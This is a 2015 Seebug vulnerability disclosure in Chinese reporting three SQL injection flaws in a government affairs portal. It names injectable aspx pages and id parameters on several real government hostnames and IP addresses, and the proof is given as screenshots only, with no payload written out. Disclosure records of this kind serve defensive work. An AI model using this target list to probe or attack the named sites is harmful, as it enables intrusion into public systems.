某政务系统三处通用SQL注入漏洞

2015-06-10T00:00:00
ID SSV:95828
Type seebug
Reporter Root
Modified 2015-06-10T00:00:00

Description

简要描述:

rt:我是良心白帽子,换了一个月的东西求发货!

详细说明:

某政务系统三处通用SQL注入漏洞。 案例1: http://121.30.211.2:81/portal/lingqiuxian_xzsp2/newsinfo3.aspx?id=25 http://www.gjzwzx.cn/portal/xzsp3//newsinfo3.aspx?id=25 http://www.gczw.gov.cn/portal/xzsp4//newsinfo3.aspx?id=25 http://211.142.37.152:89/portal/xzsp3//newsinfo3.aspx?id=25 http://www.dtzwdt.gov.cn/portal/xzsp3//newsinfo3.aspx?id=25 案例2: http://121.30.211.2:81/portal/lingqiuxian_xzsp2/newsinfo4.aspx?id=1 http://www.dtzwdt.gov.cn/portal/xzsp3/newsinfo4.aspx?id=1 http://211.142.37.152:89/portal/xzsp3/newsinfo4.aspx?id=1 http://www.gczw.gov.cn/portal/xzsp4/newsinfo4.aspx?id=1 http://www.gjzwzx.cn/portal/xzsp3/newsinfo4.aspx?id=1 案例3: http://121.30.211.2:81/portal/lingqiuxian_xzsp2/newsinfo5.aspx?id=1 http://www.dtzwdt.gov.cn/portal/xzsp3/newsinfo5.aspx?id=1 http://211.142.37.152:89/portal/xzsp3/newsinfo5.aspx?id=1 http://www.gczw.gov.cn/portal/xzsp4/newsinfo5.aspx?id=1 http://www.gjzwzx.cn/portal/xzsp3/newsinfo5.aspx?id=1

漏洞证明:

注入证明: 案例1: http://121.30.211.2:81/portal/lingqiuxian_xzsp2/newsinfo3.aspx?id=25

<img src="https://images.seebug.org/upload/201506/1015405269951350fad8683c27f81d7412f52115.jpg" alt="QQ图片20150610153957.jpg" width="600" onerror="javascript:errimg(this);">

案例2: http://121.30.211.2:81/portal/lingqiuxian_xzsp2/newsinfo4.aspx?id=1

<img src="https://images.seebug.org/upload/201506/10154108e65ceefd9e146441b75b4e810fe7a5c6.jpg" alt="QQ图片20150610153957.jpg" width="600" onerror="javascript:errimg(this);">

案例3: http://121.30.211.2:81/portal/lingqiuxian_xzsp2/newsinfo5.aspx?id=1

<img src="https://images.seebug.org/upload/201506/10154118ba14c795382cce968f4ec2d4186d8df9.jpg" alt="QQ图片20150610153957.jpg" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201506/10154127d40cf5ebe2f50cedc677ff1a6437aa63.jpg" alt="QQ图片20150610154012.jpg" width="600" onerror="javascript:errimg(this);">